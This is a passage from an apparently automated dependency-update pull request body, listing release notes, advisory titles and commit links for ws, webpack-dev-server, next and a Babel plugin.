href=\"https://github.com/websockets/ws/commit/d3503c1fd36a310985108f62b343bae18346ab67\"\u003e\u003ccode\u003ed3503c1\u003c/code\u003e\u003c/a\u003e [minor] Export the \u003ccode\u003ePerMessageDeflate\u003c/code\u003e class and header utils\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/3ee5349a0b1580f6e1f347b59ec3371011bd8481\"\u003e\u003ccode\u003e3ee5349\u003c/code\u003e\u003c/a\u003e [api] Convert the \u003ccode\u003eisServer\u003c/code\u003e and \u003ccode\u003emaxPayload\u003c/code\u003e parameters to options\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/91707b470ebd803aaa3fd1e896217740f39267d4\"\u003e\u003ccode\u003e91707b4\u003c/code\u003e\u003c/a\u003e [doc] Add missing space\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/8b553192268810a83253e2a4a39ac16768e75bb3\"\u003e\u003ccode\u003e8b55319\u003c/code\u003e\u003c/a\u003e [pkg] Update eslint to version 10.0.1\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/websockets/ws/compare/8.17.1...8.20.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `webpack-dev-server` from 5.2.2 to 5.2.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/releases\"\u003ewebpack-dev-server's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.2.4\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.3\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/blob/main/CHANGELOG.md\"\u003ewebpack-dev-server's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/fd401308f1cc026262880e2dab810004d6444282\"\u003e\u003ccode\u003efd40130\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ece4f3617bea31fb6d3833f69a32b6c289959a49\"\u003e\u003ccode\u003eece4f36\u003c/code\u003e\u003c/a\u003e chore: update deps (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5661\"\u003e#5661\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/a2161442a314a06a97e25d1404d08410cb4e9c51\"\u003e\u003ccode\u003ea216144\u003c/code\u003e\u003c/a\u003e ci: fix test (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5658\"\u003e#5658\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/df073c53a8cefb54210b43813fa6ee60364a554e\"\u003e\u003ccode\u003edf073c5\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/b550a702bd4246d1724513b70de0bfbe6604672f\"\u003e\u003ccode\u003eb550a70\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/9704dc52e3f696ae1446428c25882745e9b65cbb\"\u003e\u003ccode\u003e9704dc5\u003c/code\u003e\u003c/a\u003e chore: upgrade selfsigned to v5 and remove node-forge dependency (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5618\"\u003e#5618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/92bf644784741e8ea5adaa4a1dc26f4d462f223d\"\u003e\u003ccode\u003e92bf644\u003c/code\u003e\u003c/a\u003e chore: bump express to update qs (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5621\"\u003e#5621\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/792b2f0bd13a3b93abf701fe3a5cf41ee16722f4\"\u003e\u003ccode\u003e792b2f0\u003c/code\u003e\u003c/a\u003e chore(deps-dev): bump the dependencies group with 4 updates (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5606\"\u003e#5606\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/6d587cab3e023675de2feedf81bcdfcec7d5b774\"\u003e\u003ccode\u003e6d587ca\u003c/code\u003e\u003c/a\u003e chore(deps): bump the dependencies group across 1 directory with 27 updates (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003e\u003ccode\u003ef91baa8\u003c/code\u003e\u003c/a\u003e fix(overlay): add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `next` from 15.4.0 to 15.5.18\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/vercel/next.js/releases\"\u003enext's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev15.5.18\u003c/h2\u003e\n\u003cp\u003eThis release contains security fixes for the following advisories:\u003c/p\u003e\n\u003cp\u003eHigh:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-8h8q-6873-q5fj\"\u003eGHSA-8h8q-6873-q5fj: Denial of Service with Server Components\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-267c-6grr-h53f\"\u003eGHSA-267c-6grr-h53f: Middleware / Proxy bypass in App Router applications via segment-prefetch routes\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-26hh-7cqf-hhc6\"\u003eGHSA-26hh-7cqf-hhc6: Middleware / Proxy bypass in App Router applications via segment-prefetch routes - Incomplete Fix Follow-Up\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-mg66-mrh9-m8jx\"\u003eGHSA-mg66-mrh9-m8jx: Denial of Service via connection exhaustion in applications using Cache Components\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-492v-c6pp-mqqv\"\u003eGHSA-492v-c6pp-mqqv: Middleware / Proxy bypass through dynamic route parameter injection\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-c4j6-fc7j-m34r\"\u003eGHSA-c4j6-fc7j-m34r: Server-side request forgery in applications using WebSocket upgrades\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-36qx-fr4f-26g5\"\u003eGHSA-36qx-fr4f-26g5: Middleware / Proxy bypass in Pages Router applications using i18n\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eModerate:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-ffhc-5mcf-pf4q\"\u003eGHSA-ffhc-5mcf-pf4q: Cross-site scripting in App Router applications using CSP nonces\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-gx5p-jg67-6x7h\"\u003eGHSA-gx5p-jg67-6x7h: Cross-site scripting in beforeInteractive scripts with untrusted input\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-h64f-5h5j-jqjh\"\u003eGHSA-h64f-5h5j-jqjh: Denial of Service in the Image Optimization API\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-wfc6-r584-vfw7\"\u003eGHSA-wfc6-r584-vfw7: Cache poisoning in React Server Component responses\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eLow:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-vfv6-92ff-j949\"\u003eGHSA-vfv6-92ff-j949: Cache poisoning via collisions in React Server Component cache-busting\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-3g8h-86w9-wvmq\"\u003eGHSA-3g8h-86w9-wvmq: Middleware / Proxy redirects can be cache-poisoned\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev15.5.16\u003c/h2\u003e\n\u003cp\u003eThis release contains security fixes for the following advisories:\u003c/p\u003e\n\u003cp\u003eHigh:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-8h8q-6873-q5fj\"\u003eGHSA-8h8q-6873-q5fj: Denial of Service with Server Components\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-267c-6grr-h53f\"\u003eGHSA-267c-6grr-h53f: Middleware / Proxy bypass in App Router applications via segment-prefetch routes\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-mg66-mrh9-m8jx\"\u003eGHSA-mg66-mrh9-m8jx: Denial of Service via connection exhaustion in applications using Cache Components\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-492v-c6pp-mqqv\"\u003eGHSA-492v-c6pp-mqqv: Middleware / Proxy bypass through dynamic route parameter injection\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-c4j6-fc7j-m34r\"\u003eGHSA-c4j6-fc7j-m34r: Server-side request forgery in applications using WebSocket upgrades\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-36qx-fr4f-26g5\"\u003eGHSA-36qx-fr4f-26g5: Middleware / Proxy bypass in Pages Router applications using i18n\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eModerate:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-ffhc-5mcf-pf4q\"\u003eGHSA-ffhc-5mcf-pf4q: Cross-site scripting in App Router applications using CSP nonces\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-gx5p-jg67-6x7h\"\u003eGHSA-gx5p-jg67-6x7h: Cross-site scripting in beforeInteractive scripts with untrusted input\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-h64f-5h5j-jqjh\"\u003eGHSA-h64f-5h5j-jqjh: Denial of Service in the Image Optimization API\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-wfc6-r584-vfw7\"\u003eGHSA-wfc6-r584-vfw7: Cache poisoning in React Server Component responses\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eLow:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-vfv6-92ff-j949\"\u003eGHSA-vfv6-92ff-j949: Cache poisoning via collisions in React Server Component cache-busting\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-3g8h-86w9-wvmq\"\u003eGHSA-3g8h-86w9-wvmq: Middleware / Proxy redirects can be cache-poisoned\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev15.5.15\u003c/h2\u003e\n\u003cp\u003ePlease refer the following changelogs for more information about this security release:\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://vercel.com/changelog/summary-of-cve-2026-23869\"\u003ehttps://vercel.com/changelog/summary-of-cve-2026-23869\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev15.5.14\u003c/h2\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[!NOTE]\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/9ff92cebcaa6ba4e7463b6fd037a8510ba9b81ec\"\u003e\u003ccode\u003e9ff92ce\u003c/code\u003e\u003c/a\u003e v15.5.18\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/00ebe23562bd7eb32dd78730984bfadb47138bcf\"\u003e\u003ccode\u003e00ebe23\u003c/code\u003e\u003c/a\u003e [backport] Disable build caches for production/staging/force-preview deploys ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/62c97ab0b5825e2cbc15f6b682d8286a8dd6a038\"\u003e\u003ccode\u003e62c97ab\u003c/code\u003e\u003c/a\u003e v15.5.17\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/423623ae38c106273085b66946ee5bf9aab77f2c\"\u003e\u003ccode\u003e423623a\u003c/code\u003e\u003c/a\u003e Turbopack: Match proxy matchers with webpack implementation (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/93594\"\u003e#93594\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/fa787399b38d9aa702118f9bd23a8315b9f0ecc6\"\u003e\u003ccode\u003efa78739\u003c/code\u003e\u003c/a\u003e Turbopack: Fix middleware matcher suffix (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/93590\"\u003e#93590\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/36e62c6eb7813e42d409eb487f93b829f4ad77e8\"\u003e\u003ccode\u003e36e62c6\u003c/code\u003e\u003c/a\u003e [backport] Turbopack: more strict vergen setup (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/93588\"\u003e#93588\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/36589b5db512b7704cdadd873cbe49b6dbcc9261\"\u003e\u003ccode\u003e36589b5\u003c/code\u003e\u003c/a\u003e [backport][test] Pin package manager to patch versions (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/93596\"\u003e#93596\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/ad6fd4e50e5aba20b60d283c42b89273a3167ccd\"\u003e\u003ccode\u003ead6fd4e\u003c/code\u003e\u003c/a\u003e v15.5.16\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/79d7dff1448483f0c8f187f98887b31019f6e494\"\u003e\u003ccode\u003e79d7dff\u003c/code\u003e\u003c/a\u003e Ignore malformed CSP nonce headers (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/103\"\u003e#103\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/c4f69086cc8dcbd81b1dbc321c98ea874d90d6f8\"\u003e\u003ccode\u003ec4f6908\u003c/code\u003e\u003c/a\u003e router-server: guard upgrade proxy against absolute-url SSRF (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/77\"\u003e#77\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/102\"\u003e#102\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/vercel/next.js/compare/v15.4.0...v15.5.18\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for next since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@babel/plugin-transform-modules-systemjs` from 7.22.5 to 7.29.7\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/babel/babel/releases\"\u003e@​babel/plugin-transform-modules-systemjs's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.29.7 (2026-05-25)\u003c/h2\u003e\n\u003cp\u003eRe-release all packages with npm provenance attestations\u003c/p\u003e\n\u003ch2\u003ev7.29.6 (2026-05-25)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-generator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/18014\"\u003e#18014\u003c/a\u003e Catchup source map position in preserveFormat (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/18001\"\u003e#18001\u003c/a\u003e [7.x packport]Improve input source map handling (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e, \u003ccode\u003ebabel-generator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17998\"\u003e#17998\u003c/a\u003e Preserve original identifier names from input sourcemaps (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17992\"\u003e#17992\u003c/a\u003e) (\u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 3\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMateusz Burzyński (\u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNicolò Ribaudo (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.5 (2026-05-05)\u003c/h2\u003e\n\u003ch4\u003e:house:  Internal\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-preset-env\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate \u003ccode\u003e@babel/*\u003c/code\u003e dependencies\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.4 (2026-05-05)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-modules-systemjs\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17974\"\u003e#17974\u003c/a\u003e [7.x backport]fix(systemjs): improve module string name support (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 1\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.3 (2026-04-30)\u003c/h2\u003e\n\u003ch4\u003e:eyeglasses: Spec Compliance\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17923\"\u003e#17923\u003c/a\u003e Support flow extends bound (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-helper-create-class-features-plugin\u003c/code\u003e, \u003ccode\u003ebabel-plugin-proposal-decorators\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17931\"\u003e#17931\u003c/a\u003e fix(decorators): replace super within all removed static elements (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-register\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17915\"\u003e#17915\u003c/a\u003e Fix thread synchronization issues in \u003ccode\u003e@babel/register\u003c/code\u003e (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-compat-data\u003c/code\u003e, \u003ccode\u003ebabel-plugin-bugfix-safari-rest-destructuring-rhs-array\u003c/code\u003e, \u003ccode\u003ebabel-preset-env\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17788\"\u003e#17788\u003c/a\u003e Add bugfix plugin for Safari array rest destructuring bug (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:nail_care: Polish\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/4fba7541180bf5f58256d8e358b544e3831ad090\"\u003e\u003ccode\u003e4fba754\u003c/code\u003e\u003c/a\u003e v7.29.7\u003c/li\u003e\n\u003cli\u003e\u003ca 